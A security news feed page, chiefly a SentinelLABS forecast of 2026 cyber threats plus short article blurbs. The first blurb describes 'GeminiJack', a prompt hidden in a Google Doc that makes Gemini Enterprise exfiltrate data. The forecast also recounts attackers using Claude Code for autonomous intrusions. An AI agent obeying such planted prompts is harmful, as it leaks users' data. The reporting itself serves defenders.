Reading view

There are new articles available, click to refresh the page.

Indirect Malicious Prompt Technique Targets Google Gemini Enterprise

MCP, vulnerabilities, F5, vulvisibility, vulnerabilities, CAST AI, KSPM, Google Kubernetes vulnerabilities

Noma Security today revealed it has discovered a vulnerability in the enterprise edition of Google Gemini that can be used to inject a malicious prompt that instructs an artificial intelligence (AI) application or agent to exfiltrate data. Dubbed GeminiJack, cybercriminals can use this vulnerability to embed a malicious prompt in, for example, a Google Doc..

The post Indirect Malicious Prompt Technique Targets Google Gemini Enterprise appeared first on Security Boulevard.

Saviynt Raises $700M at Approximately $3B Valuation

By: The Gurus

Saviynt has today announced a $700M Series B Growth Equity Financing at a valuation of approximately $3 billion. Funds managed by KKR, a leading global investment firm, led the round with participation from Sixth Street Growth and TenEleven, as well as new funding from existing Series A investor Carrick Capital Partners.

The investment reflects what many in the cybersecurity sector see as an accelerating shift: as organizations deploy generative AI, autonomous agents, and machine-driven workflows, identity security is becoming core infrastructure rather than a back-office compliance function.

AI Spurs a New Identity Crisis

Saviynt’s platform is designed to manage the full spectrum of digital identities now proliferating across enterprises, from employees and contractors to machine workloads, service accounts, certificates, keys, and increasingly AI agents that operate autonomously.

Unlike earlier identity and access management tools built for predictable human usage, modern platforms must govern identities that make real-time decisions and interact continuously across cloud environments and AI ecosystems.

“This is a defining moment for Saviynt and the industry,” said Founder and CEO Sachin Nayyar. “The demand for secure, governed identity has never been greater. Identity has become central to enterprise AI strategies, and this investment gives us the resources to meet that demand globally.”

Saviynt’s unified architecture merges identity governance (IGA), privileged access management (PAM), application access governance (AAG), identity security posture management (ISPM), and access gateways into a single AI-enabled platform designed for cloud-native environments.

KKR Expands Its Cybersecurity Footprint

For KKR, the investment extends a two-decade track record of backing high-growth cybersecurity firms. The firm has previously supported companies such as Darktrace, ReliaQuest, KnowBe4, Ping Identity, ForgeRock, and Semperis.

“Saviynt has built one of the most advanced and comprehensive identity security platforms in the market, purpose-built for the AI era,” said Ben Pederson, Managing Director at KKR. “We look forward to partnering with the team to scale their platform globally and advance their next-generation AI capabilities.”

KKR is investing through its Next Generation Technology Growth Fund III.

Rapid Customer and Platform Growth

Saviynt’s momentum reflects the growing urgency of securing both human and non-human identities. The company now serves more than 600 enterprise customers, including over 20% of Fortune 100 companies.

The company has recently:

  • Launched new tools for AI Agent Identity Management and Non-Human Identity Management
  • Expanded its PAM and ISPM capabilities
  • Added AI-enabled intelligence to automate onboarding, access reviews, and provisioning
  • Delivered integrations with AWS, CrowdStrike, Zscaler, Wiz, and Cyera

Funding to Accelerate R&D and Ecosystem Expansion

Saviynt plans to use the capital to accelerate product development, expand AI-based utilities designed to help customers migrate from legacy systems, and deepen integrations with hyperscalers, software vendors, and channel partners.

The company said it also aims to strengthen its global go-to-market efforts as enterprises confront the security challenges introduced by AI-driven operations.

Advisors

Piper Sandler served as Saviynt’s exclusive financial advisor. Cooley LLP advised Saviynt, while Latham & Watkins LLP represented Carrick Capital Partners. Gibson, Dunn & Crutcher LLP advised KKR, and Moelis & Co along with Kirkland & Ellis LLP advised Sixth Street Growth.

The post Saviynt Raises $700M at Approximately $3B Valuation appeared first on IT Security Guru.

Cybersecurity 2026 | The Year Ahead in AI, Adversaries, and Global Change

As we close out 2025 and look ahead to 2026, nothing is as we might have expected even a year ago. AI has disrupted, and will continue to disrupt, every corner of modern life. In threat intelligence, SentinelLABS has not only recognized this shift but actively pivoted to meet it. At the same time, geopolitical alignments have grown increasingly unstable, with long-standing relationships now less certain than ever.

How will these new realities shape enterprises’ ability to anticipate and counter the cyber threats forming on the horizon? Predictions always carry the caveat that the future remains intractably unknowable, but even the unexpected emerges from trajectories already in motion.

In this post, SentinelLABS researchers and leaders share their perspectives on how the cyber threat landscape is evolving and what may lie ahead. Read on to explore how developments in global strategy, organized cybercrime, and of course, AI could impact us all in the coming year.

 

The Forgiving Internet is Over

The cybersecurity industry has been living on borrowed time, and AI is about to call in the debt.

The effects of cyberattacks are not always immediately visible: sometimes they go by entirely unnoticed. That encourages a fundamental cybernetics problem, as there isn’t an obvious causal link between the levers available to defenders and the constraining effects imposed on attackers.

That broken loop can create a corrosive perception that what we do doesn’t have meaningful effects, which has allowed our industry to backslide into lowest-investment, compliance-checkbox territory.

Meanwhile, the feedback delay entails that just as exploitation can go unnoticed for years, technical debt sits dormant, unnoticed for prolonged stretches.

We are moving to a future where being vulnerable and being hacked are not two separate steps. Today, organizations run edge appliances riddled with a bottomless supply of weaponizable vulnerabilities and n-days, and yet they often come away uncompromised simply because no one has gotten around to them yet.

Consider Cl0p’s MOVEit campaign: nearly 2,800 organizations compromised, 96 million individuals’ data exposed and the group was still processing victims more than a year after the initial breach. Cl0p explicitly stated they leaked names slowly to avoid overwhelming their own negotiation capacity. The attack itself was automated, executed over a holiday weekend, largely complete before the patch dropped, but extortion is human work. That capacity bottleneck —the gap between what automation can compromise and what humans can monetize— is about to disappear.

The internet’s forgiveness is a function of attacker capacity, and AI is a capacity multiplier. When autonomous agents can probe, validate, and exploit at machine speed, the gap between vulnerable and compromised collapses. Without a countervailing investment in AI-native defense, that asymmetry becomes the defining feature of the landscape.

Attackers will harness AI as a force multiplier long before defenders do. Scrappy resourcefulness, clear financial incentives, and freedom from procurement cycles guarantee it.

The alignment discourse is a distraction. Local models on consumer hardware, unconstrained foreign providers, and enterprise no-retention deployments attest to this. The moment capable computer-use models run locally, guardrails become irrelevant. Anthropic’s recent disclosure of Chinese operators using Claude Code for autonomous intrusions is instructive: one operator hitting thirty targets with minimal human intervention. By their own account, model hallucinations did more to slow the attackers down than any guardrails.

If defenders can thank AI for anything, it will be a fundamental reassignment of value, a revamping of capacity, and a necessary reimagining of what’s possible.

Feeble attempts to conjure tens of thousands of competent practitioners out of thin air have clearly floundered. Thankfully, getting more bodies isn’t the only way to increase capacity anymore. AI offers exactly that. It invites us to revisit implicit ROI calculations we abandoned long ago. We can now reconsider activities that required human intervention but were deemed too incremental and repetitive to be consequential: processing every document in a breach disclosure, pre-processing logs at scale, reverse engineering tangential codebases to better understand malicious code. These were not impossible tasks; they were tasks we decided not to attempt. That calculus has changed.

However, we must be clear-eyed about what we are adopting. These systems are non-deterministic. We are integrating a new form of evaluative power that is commoditized and cheap but also largely outside our control. Their outputs need to be wrangled into predictably acceptable parameters. The organizations that operationalize AI effectively will be those that learn to harness uncertainty within acceptable bounds rather than pretend it doesn’t exist.

What the market is missing (and desperately requires) are organizations that function as step-down transformers: converting raw frontier capability into security outcomes. Frontier labs are racing toward general capability while treating security as one of several potential markets. The result is a gap between what models can theoretically accomplish and what defenders can reliably deploy. Someone must bridge that gap with products and services that translate commoditized evaluative power into deployable autonomy.

This means investment in experimentation to redefine security problems in terms of what AI can make tractable, improve, or solve without waiting for archaic vendors to catch up. The threat actor(s) using Claude Code to maximize their operational capability didn’t stumble into competence. They iterated, tested, and created a harness for ready deployment with the human as far out of the loop as possible. Defenders will need equivalent rigor.

The opportunity is real and sizable. Seizing it requires that security as a practice becomes AI-native. Organizations that treat AI as another line item will find themselves overwhelmed by an operational tempo they cannot match. Those who internalize it as a fundamental shift, on both sides of the adversarial line, have a chance to redefine the dynamics of the security space. The value generated in 2026 and beyond is entirely concentrated in filling that gap between frontier capability and operational deployment.
Juan Andres Guerrero-Saade (JAGS), Senior Technical Fellow and VP of Intelligence and Security Research, SentinelLABS

 

Hemispheric Crossfire | US–Venezuela Cyber Operations Drag in the Big Three

As of late 2025, Venezuela has already shifted from a chronic crisis to a genuine flashpoint. U.S. carrier groups and expanded maritime operations in the Caribbean, public talk of “closing” Venezuelan airspace, and speculation about regime‑change scenarios have raised the temperature dramatically. Caracas, for its part, is signaling a willingness to fight a long guerrilla struggle and “anarchize” the environment if the U.S. moves militarily. At the same time, Venezuela has deepened its alignment with Russia, Iran, and China, explicitly seeking security guarantees, capital, and military assistance from all three.

In such an environment, a realistic 2026 development is the partial exposure of U.S. offensive cyber and information operations targeting Venezuela. This doesn’t mean Hollywood‑style leaks of every covert program; it looks more like a mosaic of glimpses: A social media platform announces a takedown of coordinated inauthentic networks seeding narratives aimed at Venezuelan military factions and diaspora communities; A contractor leak reveals tooling used to profile Venezuelan officers, union leaders, and local elites; A regional report connects seemingly independent media outlets and meme sources back to U.S.-linked funding and infrastructure, blurring the line between strategic communications and covert influence.

None of this is unprecedented. Great powers all play in this space, but the political salience of Venezuela today means the blowback will be sharper and more public than usual.

That exposure offers raw material for counter‑narratives and operations by Caracas’ backers. Russia is already running well‑funded Spanish‑language disinformation and propaganda campaigns across Latin America, often in coordination with partner state media, with a long‑standing focus on undermining U.S. standing in the region. Iran has used Venezuela as a beachhead for sanctions evasion, proxy networks, and anti‑U.S. activity, including leveraging IRGC and Hezbollah-linked structures to expand its reach in the hemisphere. China, meanwhile, is quietly consolidating intelligence collection capabilities via regional ground stations, telecom infrastructure, and proximity to key undersea cables, assets Western analysts already flag as potential platforms for surveillance of U.S. communications.

In 2026, we should expect to see cyber and information operations explicitly framed as “defending Venezuela from U.S. aggression”, but operationally aimed at the United States and its closest partners.

  • Russian and Venezuela‑aligned influence networks will likely amplify any evidence of U.S. IO/espionage, real, exaggerated, or fabricated, into Spanish and English‑language campaigns targeting U.S. domestic audiences, Latin American publics, and the Venezuelan diaspora.
  • Iranian‑linked actors can be expected to piggyback on the crisis to probe U.S. critical infrastructure and financial networks under an “Axis of Authoritarianism” narrative, using the Venezuela storyline to justify escalation in cyber operations they were running for other reasons anyway.
  • Chinese‑linked capabilities are more likely to manifest as intensified collection and mapping, SIGINT on U.S. deployments, diplomatic traffic, and commercial flows, rather than loud influence campaigns, but that data will feed the same broader alignment.

For CTI teams, the prediction isn’t some “ big Venezuela cyber war,” it’s a convergence problem. A Venezuelan crisis becomes the pretext that ties together Russian, Iranian, Chinese, and local pro‑regime operators into loosely synchronized campaigns: hack‑and‑leak operations targeting U.S. policy debates; cross‑platform disinformation linking Venezuela to border, drugs, and migration narratives; the probing of U.S. energy, maritime, and telecom infrastructure under the cover of regional tension.

Expect to see Spanish‑language infrastructure and personas show up in incidents that ultimately impact U.S. and European networks and more clusters where attribution threads run through Caracas and Moscow/Tehran/Beijing at the same time. The organizations most likely to feel this first are those at the seam lines: energy, logistics, telecom, diaspora media, and NGOs with one foot in the U.S. and one in the region.
Tom Hegel, Distinguished Threat Researcher, SentinelLABS

 

China’s Fifteenth Five Year Plan

A new Five-Year Plan from the Chinese Communist Party means a new hit-list for China’s hackers.

After Xi came into power in 2013, he set about issuing development goals for science and technology in China not seen since the leadership of Mao Zedong. The most notable, Made in China 2025 was released two years later in 2015. After American opprobrium reached its peak in the first Trump administration, China slowly withdrew MIC2025 from the limelight. American attention to the strategy led to significant collection difficulties for the PRC as the US FBI and other government agencies prioritized defense of targeted technologies in the private sector and at US research institutions, like universities.

In 2021, the PRC released publicly only a vague outline of the Party’s Medium- to Long-Term Development Plan for Scientific and Technological Innovation, which set innovation goals for 2025, 2030, and 2035. Foreign attention to MIC2025 led the Party to mark the full content of the plan as “internal circulation only.”

The 15th Five-Year Plan promises to push some of those privately-held development goals into the spotlight. The PRC central government will release the official 15th FYP in 2025, and will delegate much of the details about achieving its objectives to government ministries. Ministries will release their more-detailed version of the 15th FYP in late 2025 or early 2026. Those documents create a political demand signal for provincial governments and bureaucracies to work towards realizing.

Contracted hackers looking to pilfer western technology and sell it to the highest bidder in China will consult those documents to identify the technologies their customers are likely to pay good money for. If your industry is on the list of targeted technologies, buckle up.
Dakota Cary, Senior Security Advisory Consultant

 

Organized Cybercrime | More Integrated, Streamlined & Aggressive

Commodities and Cartels

Ransomware and infostealers are now commodity features. We’ve blown past this milestone in the last couple of years. Consider ransomware and data exfiltration as givens in the event of any opportunistic breach. While the days of the ‘big brand’ extortion operations are waning, we are seeing more smaller, organized groups offering à la carte services, including ransomware, but ultimately, this is just another feature available in ‘run of the mill malware’.

The blending of infostealer and ransomware-style features into more swiss-army knife tools and services will attract a broader set of criminals, a natural evolution already underway, given the heavy reliance of modern attacks on the infostealer logs ecosystem.

This also overlaps with the trend towards more ‘Cartel-style’ operations or ‘alliances’ which consolidate disparate malicious services into more all-encompassing “MaaS” offerings.

Ransomware & Initial Access Brokers

As these cartels and service ecosystems solidify, the relationships that underpin initial access are tightening as well. Ransomware groups continue to work closely with IABs (Initial Access Brokers), with an increasing number of threat actors publicly and aggressively attempting to recruit ‘trusted’ IABs. Groups like Sicarii advertise special advantages to others willing to partner with them.

Sicarii Ransom’s ‘recruitment’ of IABs

Additionally, we can expect to see IABs starting to offer more targeted bundles consisting of curated credential sets. For example, IABs will start offering ‘chains’ based on cumulative sets of related credentials (chain of VPN->O365->Cloud Console access for a target). There are some specializing in this now, but we expect this to become more mainstream as the infostealer log ecosystem, which feeds many IABs, continues to explode.

Increasing Attacks Will Offer Defenders Fewer IOCs and Artifacts

There are some interesting micro trends within these smaller, more obscure, operations. One such trend is the omission of ransom notes and other noisy filesystem artifacts, and threat actors moving towards more direct follow-ups via emails and phone calls to initiate communications.

We have seen groups like “Penguin Cartel’ operate in this way, and we expect adversaries to increasingly embrace these alternate methods of first notification in extortive attacks.

Businesses Will Keep Losing Data, Encryption Not Required

This operational “quieting” aligns with another growing trend: attackers no longer need to encrypt data to profit from it. This is far from new, but it is increasing. More crimeware actors eschew encryption entirely, opting to extort victims to prevent release of the exfiltrated data. Groups like Kairos and WorldLeaks are current examples of this model.

Kairos DLS banner (exfiltration only)

More Automation, More Upscaling

While the “AI-revolution” has yet to fully transform the downstream atomic artifacts of crimeware, cybercriminals are taking advantage of various automation options, using AI to augment and scale-up their output.

An increasing number of actors are leveraging AI agents, Telegram Bots and similar features both to automate discovery and sales of their product and C2 activities. This has long since been a practice in the traditional infostealer community, but we are seeing an uptick of this across the crimeware landscape.

Pressure Escalates Tactics

Threat actors are continuing to apply real-world violence (VaaS) to ensure their profitability. Naming-and-shaming via data leak sites will remain a permanent feature of the landscape, but we will see further pressure being applied to business clients, customers, family members and entities that are peripheral to the victim. One common manifestation of this is swatting groups being called upon to apply pressure to financial crime victims.

Additionally, threat actors will continue to leverage regulatory and compliance laws to apply pressure and time leak announcements around critical events such as earnings calls or M&A negotiations.
Jim Walter, Senior Threat Researcher, SentinelLABS

 

Living Off Apple’s Land | Latent Powers and Stolen Trust

Last year, we noted how threat actors were making hay abusing AppleScript’s spoof-friendly ability to create password dialog boxes to gain elevated privileges, but as many unfortunate victims have been finding out this year, that’s far from all AppleScript is good for.

ClickFix is the new social-engineering kid-on-the-block for every stripe of threat actor from nation state APTs to opportunistic cryptowallet-stealing cybercriminals. Dropping a simple two-line AppleScript that opens an innocuous webpage, perhaps a support portal for some legit technology, with up to 10000 blank lines ending with a few malicious lines of code is a ridiculously simple but effective method of social engineering.

A macOS ClickFix-style social engineering script

2026 will see the continuation of both techniques. However, as old as Python and as powerful as PowerShell, AppleScript has a lot more juice left in it from a threat actor point of view.

We are just beginning to see the first signs of adversaries making use of AppleScript’s Objective-C (AS-ObjC) bridge — a wonderful technology that brings the power of Apple’s Foundation and AppKit frameworks, including NSWorkspace, to simple AppleScripts. In the past, we’ve seen AS-ObjC’s newer cousin JXA (JavaScript for Automation) gain traction in red-teaming tools like Apfell; it’s a small conceptual leap from there to the (arguably) easier world of AppleScript Objective-C.

That opens up a whole new world of in-memory scripting power that otherwise usually requires a compiled binary and readily-detectable file writes. Will we see threat actors lean into this old, built-in, not-widely known, yet incredibly powerful way of programming Mac computers? If you’re a threat actor, it’s a Living-off-the-Land technology dream come true. If you’re a defender, it’d be smart to start thinking about what that looks like from a telemetry point-of-view in 2026. And while we’re on the topic of powerful, Apple Framework-enhanced scripting languages, Swift scripting is a thing worth keeping in mind, too.

On macOS, ClickFix was a necessity-is-the-mother-of-invention response to Apple’s plugging of the Gatekeeper workaround. However, you don’t need a bypass to Apple’s increasingly strict code signing and notarization rules if your malware is signed with a valid developer ID.

Illicit trade in verified Apple Developer accounts is something we’ve seen increase in the latter half of 2025, and it’s only a matter of time before we see these abused by more malware authors. Temporary they may be, as Apple is quick to nix such accounts once identified, but even a short-lived campaign can do a lot of damage against the right targets.

The lesson for defenders is not to treat validly code signed executables as some kind of exception to detection rules. Signed code tells a defender little more than that it passed Apple’s automated checks and that the code has a name attached to it. In the case of malware, that’s almost certainly not the name of a threat actor.
Phil Stokes, macOS Research Engineer, SentinelLABS

 

The AI Reckoning | Consolidation, Censorship, and Economic Fallout

Specialized Models Will Belong to Those Who Can Make Them

Over the next few years, we’ll watch a huge number of AI companies simply disappear.

The generic “copilot for X” and “AI workspace” products that dominated pitch decks in 2023–2024 will be reborn as bloodless, checkbox features inside Microsoft 365, Google Workspace, and other large platforms. The quality will be worse than the specialized startups they replace, but that won’t matter because they’ll be easy to buy on an enterprise contract, come bundled with existing tools, and be turned on with a toggle in an admin console.

The result will look like a mass extinction. Valuations will implode and the easy money will evaporate. The tech influencer class on X will still push the “996 grindset mentality” even as the few humbled survivors of the crash pivot from “owning the category” to cutting costs and delivering durable value to a smaller, demanding set of customers.

But this is also exactly the environment in which truly specialized organizations start to matter. These smaller entrants will sit in narrow, high-stakes domains: cybersecurity, law, finance, industrial control, biotech…

In those areas, the winners will be teams that have quietly built a repeatable data and training pipeline, have access to proprietary datasets, and can deploy smaller models that are integrated into specific workflows, regulations, and hardware.

Advances in training efficiency, data curation, and model compression will be among the most valuable pieces of this puzzle, and they will increasingly move out of public view. Labs will publish less, national-security programs will classify more, and a handful of specialized shops will jealously guard their pipelines.

The Bubble Pops in a Poisoned Reality

AI is unpopular as an idea. For most consumers it means glitchy chatbots, over-eager automation at work, auto-generated spam, and marketing departments screaming about “AI-powered” everything. The underlying capabilities are real, but the experience is mostly annoyance, precarity, and a strong sense that someone else is getting rich off a thing that is happening to you, not for you.

On top of that resentment, we’ve layered a classic asset bubble. Capital has flooded into anything AI: driving valuations, headcount, and infrastructure spending far beyond what current use-cases justify. In the last year, large tech companies have fired workers while bragging about “AI efficiencies,” even when they’re mostly just undoing years of over-hiring.

The important prediction isn’t “a bubble exists”; it’s how people will react when it finally hits the wall. Within the next year we should expect a dot-com–scale drawdown in AI equity and private valuations: a broad repricing of pure-play “AI companies,” at least one of today’s marquee AI darlings valued at less than a third of its peak, and a long tail of late-stage startups ruthlessly zeroed-out. The hyperscalers will survive because AI is one line item inside a much larger machine; most everyone else will discover that they built a feature, not a business.

The crash will happen in a reality already saturated with synthetic content. In the scramble to justify their spend, organizations are using models to flood every channel with low-cost output: SEO sludge, autogenerated news, endless pitches, synthetic “user reviews,” fake engagement. Previously trusted sites and platforms are already quietly tilting from human-written to machine-written material because the unit economics are irresistible. The problem is they are using last decade’s metrics: what is the actual economic value of Daily Active Users when the content they are consuming is slop that nobody can monopolize?

As the synthetic layer of our online experience deepens, models are trained and retrained on their own exhaust and on rival models’ curated “knowledge bases”, wiki-like sites and reference corpora that are themselves partially or wholly machine-written. Systems start to treat these partisan or synthetic compilations as “ground truth” simply because they look like structured authority.

“Model poisoning” as a subset of a larger, more pernicious “reality poisoning”

The targeted threat of “model poisoning” becomes the inescapable threat of “reality poisoning” and the line between what actually happened and what the machine inferred as plausible will vanish.

This increasingly synthetic environment directly undermines the business case that justified the bubble in the first place. Search gets worse, watered down, and commoditized. Feeds become vacuum sealed bubbles where nothing breaks containment. Analytics get noisier and less reliable. Conversion rates slip as users learn to distrust what they see on screens. Enterprises that bought AI to “supercharge knowledge work” find that their internal knowledge bases are now clogged with plausible nonsense that’s harder and harder to audit. The marginal ROI on yet another AI integration rapidly decays.

So when the capital tide goes out, the public story will be simple and hostile. “AI took my job and ruined the internet.” The actual big picture may be composed of macro economics, overcapacity, and misallocated capital, but the emotional truth will be that AI made jobs less secure, the information environment less trustworthy, and the daily experience of technology spammy and brittle.

In the aftermath, the models will remain, the infrastructure will remain, and the incumbents will survive by using them where they produce actual value. What won’t survive will be broad-based cultural, political, and financial enthusiasm.

In the next year, we will end up with powerful systems embedded deep in a few dominant platforms, operating in a permanently contaminated data environment, surrounded by a public that no longer believes the marketing and cannot trust the outputs.

Dual-Use Will Eat Alignment and Turn Into Regional Censorship

AI and LLM development are on track to become core pillars of national defense. Questions about “U.S. vs. China vs. everyone else” will move out of policy think-tanks and into mainstream geopolitics. Behind closed doors, frontier systems will be evaluated less as “products” and more as strategic infrastructure: tools that can rewrite the balance of cyber offense, intelligence gathering, and information operations both at home and abroad.

In this world, statements of “public model alignment” will become less important. The loud, visible debates about fairness, bias, and “responsible AI” will continue, but the most consequential work on offensive AI capabilities will move into secure facilities, export-controlled supply chains, and gray markets. The question will shift from “Is this system aligned with human values?” to “Is this system aligned with our national interests?”

Because AI systems are inherently dual-use, offensive capabilities and control affordances will be developed in parallel. The same model that politely refuses to discuss certain topics in a consumer chat interface will have close cousins tuned for intrusion discovery, vulnerability triage, targeted influence, and automated exploitation. Many of those capabilities will originate in state-backed programs, but they won’t stay there. They’ll diffuse into law enforcement, domestic security services, and private contractors, where they will be applied to civilian populations as instruments of soft control and, when desired, hard power.

That logic will leak out into the consumer layer as regionalized safety controls. As these technologies scale, they will increasingly mirror existing patterns of information control. Providers will ship different rule-sets and behaviors by jurisdiction, the way streaming platforms already fragment their catalogs country by country. Providers will claim that this represents “localization” efforts — where differences in language and cultural references are updated for the target population. What they are really localizing is the range of thinkable thoughts within a language model.

Whatever their marketing stance on “neutrality” or aversion to particular ideological labels, major providers will have very strong incentives to align their models with local statutes, regulatory guidance, and informal political red lines. If a given government can threaten licenses, data-center permits, key executives, or revenue streams, the “alignment layer” becomes one more lever for the powerful. Governments will jump at the opportunity to tweak refusal patterns, soften the model’s treatment of this history, or remove guidance that might make protests more effective.

Over time, legislators, regulators, authoritarian regimes, and litigators will get a much sharper sense of where these levers sit inside these systems: how content filters work, what knobs exist for toxicity, radicalization, and persuasion, or how model-delivered advice translates into real-world actions. The volume and specificity of legal and policy demands on these knobs will expand accordingly.

Engineering teams at these companies will spend less time debating abstract philosophical framings and more time implementing tightly scoped, jurisdiction-specific constraints designed by lawyers and national security officials.

The result will be a stratified ecosystem:

  • Public, region-locked models that are heavily constrained will become the systems most people will interact with day to day.
  • Institutional and security-grade models, derived from the same or larger bases but deployed inside governments, defense contractors, and domestic security agencies, will be used to profile, predict and shape human behavior at scale.
  • Informal and illicit models will be leaked, stolen, or quietly licensed and recirculate similar capabilities into criminal markets and non-state actors.

In all three layers, “alignment” will be eaten by dual-use. The systems will be “aligned” to institutional goals, not to a shared, global notion of human flourishing. The public will experience this as an explosion of region-specific censorship and weirdly divergent realities between models that reflect different value systems.

In short, the coming wave of LLM censorship by major U.S. and allied companies is the civilian-facing expression of a deeper shift. Once AI is framed first as a strategic asset and only secondarily as a consumer product, dual-use incentives dominate. Alignment becomes a branch of national security and regulatory compliance, and the map of model behavior starts to trace the borders of political power rather than the contours of an egalitarian reality.
Gabriel Bernadett-Shapiro, Distinguished AI Research Scientist, SentinelLABS

 

Zero or No Trust | Interconnected Services Lead to Increasingly Devastating Intrusions

Zero Trust Architecture networks have been increasingly ubiquitous over the last five years, with the pandemic driving many organizations to rapidly adopt and implement related technologies to support the sudden uptick in remote work. Threat actors were slower to adapt through 2020-2022, as there were plenty of targets who had not jumped on the ZTA bandwagon. Early adopters targeting these environments made headlines by compromising often tech-forward organizations, a far cry from the companies typically in the news for huge ransomware attacks against legacy networks.

In 2025, there were several campaigns where actors targeted highly interconnected environments by focusing on identity providers. The ShinyHunters campaign abusing OAuth relationships in certain Salesforce user environments is a notable example: granting OAuth access to the Data Loader app enabled the attackers to access the victim environment and exfiltrate data using a Salesforce tool intended to do exactly that. Similarly, in August 2025 attackers abused the Salesloft Drift application to hijack OAuth rights to harvest cloud service and SaaS credentials from the targeted environment.

There is huge potential for actors who identify improperly configured or abandoned OAuth-enabled applications. This was demonstrated in 2024 when Midnight Blizzard struck gold by discovering a legacy application in Microsoft’s test environment that enabled high-privileged access to corporate environments. For several years, skilled cloud attackers have been working on tools that map both resources and OAuth relationships in target environments.

While gaining access to such a high value environment as a major cloud service and operating system provider may not be feasible for most actors, increases in automated scanning and data evaluation will only make finding new, well-connected targets easier.

Based on the increased prevalence of Zero Trust environments, an increased attacker focus and understanding of SaaS identity providers, and the rise in sophistication of tools used to identify relationships between identities and assets in organizations’ environments, we believe there is a significant risk for attacks that misuse the new forms of “trust” used to authenticate applications within environments.

A potential evolution we may see in 2026 is tooling that not only targets one SaaS application and its downstream connections, but likely has some degree of automation or evaluation through agentic AI analysis to continue performing more phases of intrusion based on findings from the previous phase.
Alex Delamotte, Senior Threat Researcher, SentinelLABS

 

AI-Driven Threats | Blurred Attribution and the DPRK Wildcard

The use of AI by adversaries will likely manifest in two ways outside of the ongoing discourse. The vast majority of attackers’ use of AI to date has been around driving greater efficiency and automating existing parts of their intrusion lifecycle. The intelligence assessments to date tend to skew towards technical improvements and capabilities.

If we look back on past assessments of emerging technologies — and let’s be honest, AI is without a doubt an emerging technology — two unexpected things tend to happen.

First, threat actors’ use of new technologies almost inevitably blurs existing assessment lines, typically around tradecraft and attribution. If we apply this to AI, the most likely upcoming shift will be lower-level/smaller groups gaining access to capabilities that were previously used to define government-affiliated programs. In particular, AI’s ability to provide language capabilities will bring low-level cybercriminals into the realm of government programs with full linguistic capabilities. This was an incredibly important capability distinction that is likely to end in the coming year solely because of AI.

The second likely outcome will be an almost inevitable surprise from DPRK’s AI use. DPRK cyber activities have previously caught intelligence organizations off-guard multiple times. Examples range from destructive attacks geared towards stopping a movie release through the current IT workers situation.

Additionally, AI has proven highly useful and effective to DPRK efforts, again the IT workers are a great example. When we pair these realities with the vast amount of illicit revenue generated by DPRK’s efforts at stealing cryptocurrency, we see an interesting situation emerging.

We have a cyber effort known to produce surprises, actively leveraging AI in a large and also previously unforeseen manner, and producing large amounts of revenue for the regime through cyber actions, both cryptocurrency theft and IT workers payments.

There is a high likelihood some level of these illicit gains will be reinvested into the DPRK cyber programs to increase their scope, scale, and impact–programs that are already actively pushing the bounds of AI use. While we do not have an expected outcome specifically, the likelihood of an unexpected, large, AI-driven surprise from DPRK is something we should be mindful of and prepared to tackle on the defensive side.

Steve Stone, SVP, Threat Discovery & Response

 

Looking Ahead & Protection Now

Moving ahead demands strong, decisive leadership based on confident security choices and the courage to evolve. For all those committed to a safer and more resilient future, SentinelOne is ready to help secure every aspect of your business. Contact us to learn more about cybersecurity built for what’s next.

Protect Your Endpoint
See how AI-powered endpoint security from SentinelOne can help you prevent, detect, and respond to cyber threats in real time.

Rebrand Cybersecurity from “Dr. No” to “Let’s Go”

CISOs, challenge, security strategy

When it comes to cybersecurity, it often seems the best prevention is to follow a litany of security “do’s” and “don’ts.”  A former colleague once recalled that at one organization where he worked, this approach led to such a long list of guidance that the cybersecurity function was playfully referred to as a famous James..

The post Rebrand Cybersecurity from “Dr. No” to “Let’s Go” appeared first on Security Boulevard.

Exploitation Efforts Against Critical React2Shell Flaw Accelerate

SLA, cyberattack, retailers, Ai, applications, sysdig, attack, cisco, AI, AI-powered, attacks, attackers, security, BreachRx, Cisco, Nexus, security, challenges, attacks, cybersecurity, risks, industry, Cisco Talos hackers legitimate tools used in cyberattacks

The exploitation efforts by China-nexus groups and other bad actors against the critical and easily abused React2Shell flaw in the popular React and Next.js software accelerated over the weekend, with threats ranging from stolen credentials and initial access to downloaders, crypto-mining, and the NoodleRat backdoor being executed.

The post Exploitation Efforts Against Critical React2Shell Flaw Accelerate appeared first on Security Boulevard.

AI-Powered Security Operations: Governance Considerations for Microsoft Sentinel Enterprise Deployments

agentic aiDeepseek, CrowdStrike, agentic,

The Tech Field Day Exclusive with Microsoft Security (#TFDxMSSec25) spotlighted one of the most aggressive demonstrations of AI-powered security operations to date. Microsoft showcased how Sentinel’s evolving data lake and graph architecture now drive real-time, machine-assisted threat response. The demo of “Attack Disruption” captured the promise—and the unease—of a security operations center where AI acts..

The post AI-Powered Security Operations: Governance Considerations for Microsoft Sentinel Enterprise Deployments appeared first on Security Boulevard.

Microsoft Takes Aim at “Swivel-Chair Security” with Defender Portal Overhaul

At a recent Tech Field Day Exclusive event, Microsoft unveiled a significant evolution of its security operations strategy—one that attempts to solve a problem plaguing security teams everywhere: the exhausting practice of jumping between multiple consoles just to understand a single attack. The Problem: Too Many Windows, Not Enough Clarity Security analysts have a name..

The post Microsoft Takes Aim at “Swivel-Chair Security” with Defender Portal Overhaul appeared first on Security Boulevard.

TransUnion Extends Ability to Detect Fraudulent Usage of Devices

authorization , systems,

TransUnion today added an ability to create digital fingerprints without relying on cookies that identify, in real time, risky devices and other hidden anomalies to its Device Risk service for combatting fraud. Clint Lowry, vice president of global fraud solutions at TransUnion, said these capabilities extend a service that makes use of machine learning models..

The post TransUnion Extends Ability to Detect Fraudulent Usage of Devices appeared first on Security Boulevard.

Nudge Security Extends Ability to Secure Data in the AI Era

AI

Nudge Security today extended the scope of its namesake security and governance platform to monitor sensitive data shared via uploads and integrations with an artificial intelligence (AI) service, in addition to now being able to identify individuals sharing that data by department or the specific tools used. In addition, Nudge Security is now making it..

The post Nudge Security Extends Ability to Secure Data in the AI Era appeared first on Security Boulevard.

❌